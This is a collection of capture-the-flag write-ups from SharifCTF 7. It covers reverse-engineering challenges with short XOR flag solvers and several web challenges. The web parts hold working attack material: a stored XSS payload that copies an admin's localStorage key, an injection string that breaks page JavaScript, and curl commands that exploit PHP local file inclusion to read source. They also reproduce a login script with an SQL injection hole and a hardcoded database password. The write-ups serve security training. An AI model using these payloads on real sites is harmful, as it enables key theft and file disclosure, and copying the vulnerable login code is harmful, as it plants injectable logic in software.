36 |   [Lost Voice 150](Misc/lost_voice)
37 |   
38 |   [What is hidden? 300](Misc/what_is_hidden)
39 | 
40 |   [Playfake 50](Misc/Playfake)
41 |   
42 | * **Pwn**
43 | 
44 |   [NoMoreBlind 200](Pwn/NoMoreBlind)
45 |   
46 |   [Guess 50](Pwn/guess)
47 |   
48 |   [Hippotie 250](Pwn/hippotie)
49 |   
50 |   [Persian 150](Pwn/persian)
51 |   
52 |   [Tehran 400](Pwn/tehran)
53 |   
54 | * **Reverse**
55 | 
56 |   [Catch Me if You Can! 300](Reverse/catch_me_if_you_can)
57 |   
58 |   [Snake 400](Reverse/snake)
59 |   
60 |   [Unloadme 200](Reverse/unloadme)
61 |   
62 |   [Getit 50](Reverse/getit)
63 |   
64 |   [RepairMe 100](Reverse/repairme)
65 |   
66 |   [SCrack 150](Reverse/scrack)
67 |   
68 |   [Nanomites 300](Reverse/nanomites)
69 | 
70 | * **Web**
71 | 
72 |   [Extra Security 300](Web/Extra%20Security)
73 | 
74 |   [jareCaptcha 200](Web/jareCaptcha)
75 |   
76 |   [CBPM 300](Web/cbpm)
77 |   
78 |   [Irish Home 200](Web/Irish%20Home)
79 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/catch_me_if_you_can/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/catch_me_if_you_can/1.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/catch_me_if_you_can/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/catch_me_if_you_can/2.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/catch_me_if_you_can/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/catch_me_if_you_can/3.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/catch_me_if_you_can/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/catch_me_if_you_can/4.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/catch_me_if_you_can/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/catch_me_if_you_can/5.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/catch_me_if_you_can/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/catch_me_if_you_can/6.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/catch_me_if_you_can/readme.md:
--------------------------------------------------------------------------------
  1 | We were given an apk (Login.apk). using dex2jar + jd we can see decompiled code of the apk.  
  2 | ```
  3 | $ d2j-dex2jar Login.apk
  4 | dex2jar Login.apk -> ./Login-dex2jar.jar
  5 | ```
  6 | 
  7 | In MainActivity class we have following onCreate method:  
  8 | ![1.png](1.png)
  9 | 
 10 | this.a is a Button and last line set a listener `a` class on it:  
 11 | ![2.png](2.png)
 12 | 
 13 | We are interested in (i==1 & (this.a.e != “unknown”)). the second part is not necessary since it is initialized with Build.SERIAL. So we are dealing with (i==1):  
 14 | ```
 15 | paramView = this.a.a(paramView);
 16 | ```
 17 | this.a is MainActivity class and this.a.a is:   
 18 | ![3.png](3.png)
 19 | 
 20 | According to HidingUtil we have following code:  
 21 | ![4.png](4.png)
 22 | 
 23 | So hidingutil library is important to us. besides we have following line:   
 24 | ```
 25 | int i = this.a.processObject(paramView);
 26 | ```
 27 | 
 28 | and we can see processObject is also a hidingUtil library function.  
 29 | 
 30 | Let’s disassemble libhidingutil.so:  
 31 | 
 32 | ```
 33 | $ unzip Login.apk lib/x86/libhidingutil.so 
 34 | ```
 35 | 
 36 | processObject disassembly:  
 37 | 
 38 | ![5.png](5.png)
 39 | 
 40 | and its psuedo code:  
 41 | ```
 42 | int Java_sharif_cert_ctf_MainActivity_processObject(char *input)
 43 | {
 44 | 	char *out = "fx1uagMGQQMWOWhyFBxnBUdzN35NPWYHUBQHRmozeEY=";
 45 | 	int len = 45;
 46 | 	char *ptr = input;
 47 | 	int check = 0;
 48 | 	do
 49 | 	{
 50 | 		if (!len)
 51 | 			break;
 52 | 		check = *ptr++ == *out++;
 53 | 		len--;
 54 | 
 55 | 	} while (check);
 56 | 	return check == 0;
 57 | }
 58 | ```
 59 | 
 60 | HidingUtil_hide disassembly:  
 61 | ![6.png](6.png)
 62 | 
 63 | after cleaning function and removing unnecessary parts we have following pseudo code:  
 64 | ```
 65 | void value_with_key(inb, outb)
 66 | {
 67 | 	char *aMy_s3cr3t_p_W0 = "My_S3cr3t_P@$$W0rD"; // .rodata
 68 | 	char l;
 69 | 	int idx = 0;
 70 | 	for (l=inb[0]; l; l = inb[idx])
 71 | 	{
 72 | 		out[idx] = aMy_s3cr3t_p_W0[idx % 0x13] ^ l;
 73 | 		idx++;
 74 | 	}
 75 | 	return;
 76 | }
 77 | 
 78 | char *Java_sharif_cert_ctf_HidingUtil_hide(char *input)
 79 | {
 80 | 	char out[33];
 81 | 	value_with_key(input, out);
 82 | 	char *rv = Base64Encode(out);
 83 | 	return rv;
 84 | }
 85 | ```
 86 | 
 87 | So what is we should solve is:   
 88 | ```
 89 | Java_sharif_cert_ctf_MainActivity_processObject(Java_sharif_cert_ctf_HidingUtil_hide(“flag”)) == 1;
 90 | ```
 91 | 
 92 | And our solver code:  
 93 | ```
 94 | #!/usr/bin/python
 95 | 
 96 | a = "fx1uagMGQQMWOWhyFBxnBUdzN35NPWYHUBQHRmozeEY="
 97 | pw = "My_S3cr3t_P@$$W0rD\x00"
 98 | print len(pw)
 99 | a = a.decode("base64")
100 | 
101 | b = ""
102 | i = 0
103 | for c in a:
104 |     b += chr(0xff & (ord(c) ^ ord(pw[i % 0x13])))
105 |     i += 1
106 | 
107 | print "flag:", b
108 | ```


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/catch_me_if_you_can/sol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | a = "fx1uagMGQQMWOWhyFBxnBUdzN35NPWYHUBQHRmozeEY="
 4 | pw = "My_S3cr3t_P@$$W0rD\x00"
 5 | print len(pw)
 6 | a = a.decode("base64")
 7 | 
 8 | b = ""
 9 | i = 0
10 | for c in a:
11 |     b += chr(0xff & (ord(c) ^ ord(pw[i % 0x13])))
12 |     i += 1
13 | 
14 | print "flag:", b
15 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/getit/getit-sol.py:
--------------------------------------------------------------------------------
1 | hardcode = 'c61b68366edeb7bdce3c6820314b7498'
2 | add_byte = [-1, 1]
3 | flag = [chr(ord(char) + add_byte[(index & 1)]) for index, char in enumerate(hardcode)]
4 | print "SharifCTF{%s}" % ''.join(flag)


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/nanomites/README.md:
--------------------------------------------------------------------------------
 1 | ## Nanomites
 2 | 
 3 | We were given a 32-bit execuable file and as the file name suggests, it uses `Nanomites` technology; As you know or maybe not, `Nanomites` is a modern anti-debug method which first was used by `Armadillo`; In short `Nanomites` replaces branchs with `0xcc` (INT_3), then creates a child process and attaches it (which calls debug block method which used by `Armadillo` for the first time) and controls the flow of the execution, then anytime `INT_3` occurs, the parent child fetches thread information and finds the match in `Nanomites` table and changes the flow to prevent crash and the program works fine.
 4 | In our tasks, parent process creates a child and the child starts debugging the parent. It aslo uses some anti-debug APIs like `IsDebuggerPresent`, `CheckRemoteDebuggerPresent` and some others wich I can't remember while writing this writeup!
 5 | Another method was CRC check which checks file checksum and prevents running if it doesn't match the hard-coded one; And the other is ASLR. OK what we do? Actully the organizers implemented these methods weakly and the code was completely naked; we just need a disassembler to find the flag. All we needed was the `IP` address and the data which is sent to the server; The `IP` part was the simple part because we need to search for strings and find it as you see in the following picture:
 6 | 
 7 | ![snapshot-1.png](snapshot-1.png)
 8 | 
 9 | And the other thing was plain-text of encrypted data which it was  too simple to find: just search for `Encrypted_` and above of it you will find decryption routine which is simple XOR:
10 | 
11 | ![snapshot-2.png](snapshot-2.png)
12 | 
13 | ``` python
14 | encrypted = [0x12, 0x2E, 0x2F, 0x35, 0x19, 0x0F, 0x35, 0x19, 0x12, 0x2E, 0x23, 0x19, 0x15, 0x23, 0x25, 0x34, 0x23, 0x32, 0x19, 0x02, 0x27, 0x32, 0x27, 0x46]
15 | secret = [chr(x ^ 0x46) for x in encrypted]
16 | print ''.join(secret)
17 | ```
18 | The secret:
19 | 
20 | ```
21 | This_Is_The_Secret_Data
22 | ```
23 | 
24 | OK, so after the competitions ended, I spent my free time on this to fix `Nanomites` which never completed but for those who want to continue, you have to disable ASLR, then you need to fix CRC check following this sequence of bytes:
25 | 
26 | ```
27 | 0F 84 1B 00 00 00 85 C0 BA 00 00 00 00 8B F6 3B F7 F7 D2 50 C1 E8 11 48 85 C6
28 | ```
29 | 
30 | Change it to `EBFE` which means jump to itself, hence making a loop. Later you can fix it after attaching to it; Changing `EBFE` to jump bypasses CRC check.Then we set a bp on `CreateProcess` and continue after step out, when the child process is created, we attach to it and fix CRC check jump and detach from parent process, and set bp on `WaitForDebugEvent` to find Nanomites table which you can find it on `00418387` and for the first time you meet him at:
31 | 
32 | ```
33 | 0041E1A9    8B1481          MOV EDX,DWORD PTR DS:[ECX+EAX*4]
34 | ```
35 | 
36 | ![snapshot-3.png](snapshot-3.png)
37 | 
38 | 1) Offset
39 | 
40 | 2) Branch type
41 | 
42 | 3) Destination
43 | 
44 | In offset+0x401000 you can find int3 instructions which needs to be fixed, destination+(number of opcodes of offset) is the correct path to jump, and the branch types operation can find at `0041E300`; find the rest by continue tracing...
45 | 
46 | ![snapshot-4.png](snapshot-4.png)
47 | 
48 | After you understand all these parts you can write you own `ollydbg script` and use its script plugin to fix the file and fix the OEP and done!
49 | 
50 | And a big thank you goes to `Raham` for helping me in this challenge
51 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/nanomites/snapshot-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/nanomites/snapshot-1.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/nanomites/snapshot-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/nanomites/snapshot-2.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/nanomites/snapshot-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/nanomites/snapshot-3.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/nanomites/snapshot-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/nanomites/snapshot-4.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/nanomites/solve.py:
--------------------------------------------------------------------------------
1 | encrypted = [0x12, 0x2E, 0x2F, 0x35, 0x19, 0x0F, 0x35, 0x19, 0x12, 0x2E, 0x23, 0x19, 0x15, 0x23, 0x25, 0x34, 0x23, 0x32, 0x19, 0x02, 0x27, 0x32, 0x27, 0x46]
2 | secret = [chr(x ^ 0x46) for x in encrypted]
3 | print ''.join(secret)


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/repairme/readme.md:
--------------------------------------------------------------------------------
1 | ## RepairMe
2 | It doesn't have executable flag in `.text` section characteristics, change and run it to get the flag!


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/scrack/readme.md:
--------------------------------------------------------------------------------
1 | ## SCrack
2 | We were given a 64-bit executable, it uses ptrace to detect tracing, it's easy to bypass this test but we don't need that actually, static analysis shows the flag, just check VA 0x400C50 and convert each hexadecimal value to its character code to get the flag...!
3 | 
4 | ![snapshot.png](snapshot.png)


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/scrack/snapshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/scrack/snapshot.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/snake/README.md:
--------------------------------------------------------------------------------
 1 | ## Snake
 2 | We were given a 32-bit executable VMProtected file. Debugging VMProtected is difficult and OllyDbg was detected and after wasting a lot of time on debugging ‘snake.exe', I was frustrated. 
 3 | 
 4 | I double checked the file and found this string: 
 5 | 
 6 | `Number of foods= number of used bytes in windows drive.`
 7 | 
 8 | I hadn't noticed it before, I don't know why but I couldn't solve my problem with OllyDbg and other debuggers stuck on protections inside VMProtect so I decided to debug my VMWare with WinDbg and it was just another pain in the neck, because it was detected too, therefore I thought maybe I had to hook some API , but my friend suggested API Monitor's breakpoint feature. I tried it and it was very straightforward.
 9 | 'Snake.exe' uses ‘RtlDosPathNameToNtPathName_U' to get Windows directory path and ‘NtQueryVolumeInformationFile' to calculate Windows drive size, so I tried to change ‘RtlDosPathNameToNtPathName_U' path to another drive with API Monitor and the rounds changed, before trying to write any code I changed it to a non-existent drive and ta-da-...! 
10 | 
11 | Problem solved without any further ado.
12 | 
13 | ![snake.png](snake.png)
14 | 
15 | Seems easy, right? :D


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/snake/snake.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/snake/snake.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/unloadme/README.md:
--------------------------------------------------------------------------------
 1 | ##Unloadme
 2 | 
 3 | Unload me correctly and capture the flag!
 4 | 
 5 | 
 6 | We can use tools like OSRLoader to install a driver and work on it.
 7 | It seems the file is protected using `Safengine (NoobyProtect SE 1.7.0.0)`
 8 | But we didn't want to miss its bonus points.
 9 | So we opened it in Notepad and got the flag; too easy
10 | 
11 | ![capture1.png](capture1.png)
12 | 
13 | The most important part is not touched by the protector engine!
14 | 
15 | ![capture2.png](capture2.png)
16 | 
17 | `SharfiCTF{cc043056a0a32cb5e104aeb2cf4ff7ba}`
18 | 
19 | 240 points in 30 seconds!
20 | Bad design or too much points?!


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/unloadme/capture1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/unloadme/capture1.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Reverse/unloadme/capture2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Reverse/unloadme/capture2.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Web/CBPM/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Web/CBPM/1.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Web/CBPM/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Web/CBPM/2.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Web/CBPM/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Web/CBPM/3.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Web/CBPM/README.md:
--------------------------------------------------------------------------------
 1 | # CBPM (web 300)
 2 | 
 3 | The participants were given an online cloud based password manager which had several options such as password change, feedback and etc. After spending some time on the task, we realized the workflow. The important consequences:
 4 | + Login can be done by any username.
 5 | + Admin user has a password labeled "flag"
 6 | + In order to reveal the stored passwords, a correct password of the user is required
 7 | ![](2.png)
 8 | + Encryption/Decryption KEY is generated by user’s password.
 9 | + KEY is saved on browser as it’s written on the site “Your decrypted master encryption key (KEY) is available in your browser and its encrypted version is stored on the server”
10 | + The exact location of `KEY` is in `localStorage` in browser 
11 | ![](3.png)
12 | + In order to decrypt flag, admin’s `password` or `KEY` is required.
13 | + The “feedback page” is prone to Cross Site Scripting without any protection or filtering.
14 | 
15 | **Attack scenario**: sending malicious payload to the admin users through feedback option, forcing admin to reveal his key.
16 | In term of exploitation, there was a problem indicated in question: By the way, admin protects its machine with a strong and restrictive firewall...
17 | Firewall means that admin couldn’t send request to internet. So our solution was to force admin to make a new label name with his local KEY. The payload used:
18 | ```
19 | <script>
20 | var b = new XMLHttpRequest();
21 | b.open("POST", "/put.php", true);
22 | b.send('{"id":"eyJ0ZWFtaWQiOiIxNDgifS4xY0lFWFguWDN0TXBxcGNuZlZFcDJ2UmZmUVBFdU1LbWVr","prelabel":"","newlabel":"'+localStorage.KEY+'","encpass":"a","iv":"a"}');
23 | </script>
24 | ```
25 | Following URL held the labels of a user.
26 | ```
27 | http://ctf.sharif.edu:8081/list.php?id=eyJ0ZWFtaWQiOiIxNDgifS4xY0laUDcuNEtIbFcwaGpoRGc5dTlJcVIwQjJjMzN2WW5R
28 | ```
29 | Admin’s labels before sending malicious payload:
30 | ```
31 | {"meta":{"ok":true,"code":0,"messages":[]},"payload":{"labels":["flag"]}}
32 | ```
33 | Afterwards:
34 | ```
35 | {"meta":{"ok":true,"code":0,"messages":[]},"payload":{"labels":["bGFDMGZYWnZORG9hc21vM0hvZHNkUjE2YjJGeU1yMUM=","flag"]}}
36 | ```
37 | So the KEY was grabbed. In the console of browser:
38 | ```
39 | localStorage.setItem('KEY', 'bGFDMGZYWnZORG9hc21vM0hvZHNkUjE2YjJGeU1yMUM=')
40 | ```
41 | And the flag was revealed: ![](1.png)
42 | 
43 | https://twitter.com/yshahinzadeh


--------------------------------------------------------------------------------
/2016-SharifCTF7/Web/Extra Security/README.md:
--------------------------------------------------------------------------------
  1 | # Extra Security (web 300)
  2 | 
  3 | The participants were given an online portal which had several parts.
  4 | Sign by Yourself (users could sign any data with a key)
  5 | See List of Signatures (The list of user’s signed data were shown)
  6 | Sign by Administrator (Sending any data to admin to sign)
  7 | Get the flag (getting flag by proper admin sign)
  8 | After spending some time on the task, we realized the workflow. The important consequences:
  9 | + Signing could not possible due to JavaScript snippet code.
 10 | + By removing JavaScript code manually, the code signing was possible.
 11 | + Admin signed everything, but the results were not shown to the users.
 12 | + The question asked participant to sign their team number by admin.
 13 | + The signing KEY was stored in cookie without HttpOnly flag.
 14 | Attack scenario: In the beginning, we tried to find a XSS vulnerability. By leveraging XSS, it could possible to force admin send their KEY to us, but after some test we were not able to exploit admin blindly. So after some time, we realized that workflow had a problem:
 15 | 
 16 | When a user wanted to sign a data, following request was sent:
 17 | 
 18 | ```
 19 | /wait_and_real_sign.php?content=test&id=eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ%3D
 20 | And the response was:
 21 | HTTP/1.1 200 OK
 22 | Server: nginx/1.6.1
 23 | Date: Sun, 18 Dec 2016 11:08:27 GMT
 24 | Content-Type: text/html; charset=UTF-8
 25 | Connection: close
 26 | Vary: Accept-Encoding
 27 | Content-Length: 1407
 28 | 
 29 | <!doctype html>
 30 | <html>
 31 | <head>
 32 |     <meta charset="utf-8">
 33 |     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
 34 |     <meta http-equiv="x-ua-compatible" content="ie=edge">
 35 | 
 36 |     <title>ExtraSecure - Wait & Sign</title>
 37 |     <link href="css/bootstrap.min.css" rel="stylesheet">
 38 |     <script src="js/index.js"></script>
 39 |     <script src="js/cookie.js"></script>
 40 |     <script>
 41 |         alert("Sorry, server is busy for a while!");
 42 |         document.location = "/index.php?id=eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ=";
 43 |     </script>
 44 | </head>
 45 | <body>
 46 | <div class="container">
 47 |     <div class="card">
 48 |         <h1 class="card-header">Signing in <i id="time">10</i> seconds...</h1>
 49 |         <p class="card-block">Please be patient... The content will be signed with your key soon and you will be
 50 |             redirected to the <i>list</i> page to view the results.</p>
 51 |     </div>
 52 | </div>
 53 | <script>
 54 |     var timeElem = document.getElementById('time');
 55 |     waitSeconds(timeElem, function () {
 56 |         var c = parse(document.cookie || '');
 57 |         var key = c['KEY'];
 58 |         var body = {
 59 |             //content: base64Decode("dGVzdA=="),
 60 |             content: "dGVzdA==",
 61 |             key: key,
 62 |             id: 'eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ='
 63 |         };
 64 |         postForm('/sign_and_store.php', body);
 65 |     });
 66 | </script>
 67 | </body>
 68 | </html>
 69 | ```
 70 | Based on the response:
 71 | 1. The JavaScript code at the bottom of response, prevented to sign data and redirected user to the home page.
 72 | 2. `KEY` was gathered by parsing cookie.
 73 | 3. `ID` was reflected in post data.
 74 | 
 75 | 
 76 | 
 77 | Interestingly, when we gave our data to admin to sign, following HTTP request were sent:
 78 | ```
 79 | [POST DATA]
 80 | ---
 81 | content=60&id=eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ%3D&url=http%3A%2F%2Fctf.sharif.edu%3A8083%2Fwait_and_real_sign.php%3Fid%3DeyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ%3D%26content%3D60
 82 | ---
 83 | ```
 84 | URL decoded data:
 85 | ```
 86 | content=60&id=eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ=&url=http://ctf.sharif.edu:8083/wait_and_real_sign.php?id=eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ=&content=184
 87 | ```
 88 | The link was similar to our data sign link. However, we had realized that JavaScript code prevented to sign data, as a result, admin was not able to sign anything yet!
 89 | So we had to find a way to disable the JavaScript code, and at the same time, not corrupting post data. The first string we came up was:
 90 | ```
 91 | /wait_and_real_sign.php?content=test&id=eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ%3D%5C
 92 | ```
 93 | Which disabled the JavaScript code. However, it corrupted post data as it’s seen:
 94 | ```
 95 | <script>
 96 |         alert("Sorry, server is busy for a while!");
 97 |         document.location = "/index.php?id=eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ=\";
 98 | </script>
 99 | <script>
100 |     var timeElem = document.getElementById('time');
101 |     waitSeconds(timeElem, function () {
102 |         var c = parse(document.cookie || '');
103 |         var key = c['KEY'];
104 |         var body = {
105 |             //content: base64Decode("dGVzdA=="),
106 |             content: "dGVzdA==",
107 |             key: key,
108 |             id: 'eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ=\'
109 |         };
110 |         postForm('/sign_and_store.php', body);
111 |     });
112 | </script>
113 | ```
114 | Some after, we found magical string:
115 | ```
116 | /wait_and_real_sign.php?content=test&id=eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ%27%2f%2f%5c
117 | ```
118 | Which represents `'//\`. At the same time, it disables JavaScript code and doesn’t corrupt post data:
119 | ```
120 | <script>
121 |         alert("Sorry, server is busy for a while!");
122 |         document.location = "/index.php?id=eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ='//\";
123 | </script>
124 | 
125 | <script>
126 |     var timeElem = document.getElementById('time');
127 |     waitSeconds(timeElem, function () {
128 |         var c = parse(document.cookie || '');
129 |         var key = c['KEY'];
130 |         var body = {
131 |             //content: base64Decode("dGVzdA=="),
132 |             content: "dGVzdA==",
133 |             key: key,
134 |             id: 'eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ='//\'
135 |         };
136 |         postForm('/sign_and_store.php', body);
137 |     });
138 | </script>
139 | ```
140 | As a consequence, we sent our payload to admin and waited for his sign:
141 | [POST DATA]
142 | ```
143 | ---
144 | content=148&id=eyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ%3D&url=http%3A%2F%2Fctf.sharif.edu%3A8083%2Fwait_and_real_sign.php%3Fid%3DeyJ0ZWFtaWQiOiI2MCJ9LjFjSVc5aC5CcGxnYnprcjVUY3BHeGlnaDQ4UjhfRzgyODQ%3D%27%2f%2f%5c%26content%3D148
145 | ---
146 | ```
147 | The admin signed our data, we entered it and grabbed the flag :)
148 | 
149 | https://twitter.com/yshahinzadeh
150 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Web/Irish Home/README.md:
--------------------------------------------------------------------------------
  1 | # Irish Home (web 200)
  2 | 
  3 | The admin.php page was discovered by a tiny fuzz. admin.php was prone to `Execution after redirect` vulnerability. The admin.php page reaveled show.php which had a parameter named `page`. The show.php had `Local File Inclusion` vulnerability. Source reading:
  4 | 
  5 | ```
  6 | # curl http://ctf.sharif.edu:8082/pages/show.php?page=php://filter/convert.base64-encode/resource=../login
  7 | # curl http://ctf.sharif.edu:8082/pages/show.php?page=php://filter/convert.base64-encode/resource=../delete
  8 | # curl http://ctf.sharif.edu:8082/pages/show.php?page=php://filter/convert.base64-encode/resource=../deleted_3d5d9c1910e7c7/flag
  9 | ```
 10 | 
 11 | delete.php
 12 | ```
 13 | <?php
 14 | require_once('header.php');
 15 | 
 16 | /*
 17 | if(isset($_GET['page'])) {
 18 | 	$fname = $_GET['page'] . ".php";
 19 | 	$fpath = "pages/$fname";
 20 | 	if(file_exists($fpath)) {
 21 | 		rename($fpath, "deleted_3d5d9c1910e7c7/$fname");
 22 | 	}
 23 | }
 24 | */
 25 | 
 26 | ?>
 27 | <div style="text-align: center;">
 28 | <h3 style="color: red;">Site is under maintenance 'til de end av dis f$#!*^% SharifCTF.</h3><br/>
 29 | <h4><b>Al' destructive acshuns are disabled!</b></h4>
 30 | </div>
 31 | <?php
 32 | require_once('footer.php');
 33 | ?>
 34 | ```
 35 | Login.php
 36 | ```
 37 | <?php
 38 | 
 39 | session_start();
 40 | 
 41 | if (!empty($_SESSION['logged_in']))
 42 | 	header('Location: /index.php');
 43 | 
 44 | require_once('header.php');
 45 | 
 46 | $text = "That account doesn't seem to exist";
 47 | 
 48 | if($_SERVER['REQUEST_METHOD'] == 'POST') 
 49 | {
 50 | 	if(!empty($_POST['username']) && !empty($_POST['password'])) {
 51 | 		$username = $_POST['username'];
 52 | 		$password = $_POST['password'];
 53 | 
 54 | 		if(strpos($password, '"') !== false)
 55 | 			$text = "SQL injection detected";
 56 | 		else {
 57 | 			$servername = "localhost";
 58 | 			$db_username = "irish_user";
 59 | 			$db_password = "3d2f27921e2c13e7b66e7b486b0feae3dde1ef25";
 60 | 			$dbname = "irish_home";
 61 | 
 62 | 			$conn = new mysqli($servername, $db_username, $db_password, $dbname);
 63 | 			if ($conn->connect_error) {
 64 | 				die("Connection failed: " . $conn->connect_error);
 65 | 			}
 66 | 
 67 | 			$sql = "SELECT * FROM users where username=\"$username\" and BINARY password=\"$password\"";
 68 | 
 69 | 			$result = $conn->query($sql);
 70 | 
 71 | 			if (!$result)
 72 | 				trigger_error('Invalid query: ' . $conn->error);
 73 | 
 74 | 			if ($result->num_rows > 0) {
 75 | 				if(strpos($username, '"') !== false)
 76 | 					$text = "SQL injection detected";
 77 | 				else {
 78 | 					$_SESSION['logged_in'] = $username;
 79 | 					header('Location: /admin.php');
 80 | 				}
 81 | 			}
 82 | 			$conn->close();
 83 | 		}
 84 | 	}
 85 | 		echo "<ul class=\"messages\"><li class=\"error\">$text</li></ul>";
 86 | }
 87 | ?>
 88 | 
 89 | 				<form action="/login.php" method="POST">
 90 | 					<div class="mdl-textfield mdl-js-textfield">
 91 | 						<input class="mdl-textfield__input" type="text" id="username" name="username">
 92 | 						<label class="mdl-textfield__label" for="username">Username</label>
 93 | 					</div><br/>
 94 | 					<div class="mdl-textfield mdl-js-textfield">
 95 | 						<input class="mdl-textfield__input" type="password" id="password" name="password">
 96 | 						<label class="mdl-textfield__label" for="password">Password</label>
 97 | 					</div><br/>
 98 | 					<div style="text-align: center;" class="mdl-textfield mdl-js-textfield">
 99 | 						<button class="btn waves-effect waves-light" type="submit">Submit</button>
100 | 					</div>
101 | 				</form>
102 | 
103 | <?php
104 | require_once('footer.php');
105 | ```
106 | deleted_3d5d9c1910e7c7/flag.php
107 | ```
108 | <?php
109 | 
